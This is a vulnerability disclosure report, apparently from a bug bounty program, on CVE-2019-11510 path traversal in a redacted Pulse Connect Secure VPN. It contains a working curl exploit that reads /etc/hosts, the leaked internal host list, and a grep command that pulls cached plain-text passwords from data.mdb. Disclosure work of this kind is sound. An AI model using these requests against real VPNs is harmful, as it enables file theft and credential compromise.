[CVE-2019-11510 ] Path Traversal on ████████ leads to leaked passwords, RCE, etc

**Summary / Description:** █████ is vulnerable to Path Traversal which can lead to remote code execution. ## Impact Critical ## Step-by-step Reproduction Instructions 1. Run the following `cURL` command to get the file `/etc/hosts` ``` curl --path-as-is -k -D- 'https://███████/dana-na/../dana/html5acc/guacamole/../../../../../../etc/hosts?/dana/html5acc/guacamole/#' ``` ``` ## File generated by DSNet::Hosts::update at Thu Aug 1 13:24:40 2019 127.0.0.1 localhost █████128.141 KMPC1_Node4 █████████252.82 acrcxznxx07d-10███ ███████252.74 acrcxznxx06d-10███ ███252.67 ODA-SCAN███ █████████252.65 ODA-VIP-1█████████ █████████252.63 ODA-1██████ ███252.196 subversion████████ ██████252.134 acrcxznxx07d-12██████ ██████████252.13 ODA-2████ █████251.16 acdeva0xxb5l010███ ████251.15 acdeva0xxb5l009████████ ███████251.14 acdeva0xxb5l008████████ █████████250.239 devikrome█████ ███████250.216 ws.soa██████ ██████████250.192 ac0hxzndb01d-07.rsn.aac████ █████████250.16 devccimm███ ██████250.112 devauth████████l devauth████████ ████████250.104 ac0hxznap02d-03████████ ███████1.235 spex████████ ████1.205 auth████████ ███1.164 internal████ internal███████ ████1.142 ensq██████████ ensq█████ ███████0.92 ac0hqa0xxa3b021.rsn.aac█████████ ███0.55 g2g███ █████████0.177 Ac0hqa0xxa1b005.rsn.aac█████████ █████64.181 ac0hqsmap13p ████64.142 ac0hqsmxx03p ██████████40.237 emmggb████████ ████████40.126 ac0hqapxx25p.rsn.aac████████ ██████████221.42 gcrcknox gcrcknox████ █████████220.81 ft1ariss█████ ██████220.245 ccimm█████████ ██████220.150 ensqrtn████ ███████220.145 pthensqtrain██████ ██████212.9 acrcea0xxb5l035█████ ██████212.64 acrcea0xxb5l034██████ ███18.60 questcentral questcentral███ ██████████163.35 hrcremedy█████ ███████78.107 afrissimt.rs████ ██████8.61 netscout███████ ████████205.203 ac0hqa0xxb5l007█████ █████████205.202 ac0hqa0xxb5l006██████████ ██████205.200 acrtna0xxb5l003█████ ███146.8 AC0HQC2A0A3B021.RSN.AAC████████ █████████146.7 AC0HQC2A0A3B020.rsn.aac████████ █████████145.91 ac0hqwsxx04p.rsn.aac█████ █████145.149 caliber11.rsn.aac███████ ████145.118 ac0hqwsap06p.rsn.aac██████████ ██████144.95 ikrome████ ft1ikrome█████████ ████144.91 Auth██████████ █████144.216 ac0hqc2a0a3b010.rsn.aac██████ ████197.16 acft1a0xxb5l005███████ ███197.15 acft1a0xxb5l004███ ████196.62 ft1ccimm██████████ █████████196.28 ft1auth████ ███████195.247 ac0hldbxx02t████ ███195.246 ac0hldbxx01t█████ ████195.195 ac0hxzndb04t-01████ ██████195.188 ac0hxznap04t-03█████████ ██████████195.158 ac0hxznxx24t-02██████ ██████████195.133 ft1internal████████ ████████195.127 ac0hxznap03t-03█████████ ██████████194.78 ws13t.soa█████ ws14t.soa█████ █████████194.165 ft1ensq███ ac0hxznxx03t-08-ensq_wls1█████████ █████194.119 rmdwebtopft1███████ ``` We can grab any other file on this system: ``` /data/runtime/mtmp/system /data/runtime/mtmp/lmdb/dataa/data.mdb /data/runtime/mtmp/lmdb/dataa/lock.mdb /data/runtime/mtmp/lmdb/randomVal/data.mdb /data/runtime/mtmp/lmdb/randomVal/lock.mdb ``` The VPN user and hashed passwords are stored in the `mtmp/system` file, but when users log into the application, it caches the plain-text password into `dataa/data.mdb`. ``` grep 'password@9' data.mdb -a ``` will get you a load of plain-text passwords ████████ ## Product, Version, and Configuration (If applicable) https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101 ## Suggested Mitigation/Remediation Actions Update the Pulse Connect Secure VPN ## Impact Critical, an attacker can get code execution with this vulnerability. ## References: https://hackerone.com/reports/591295 Thanks, Corben (@cdl)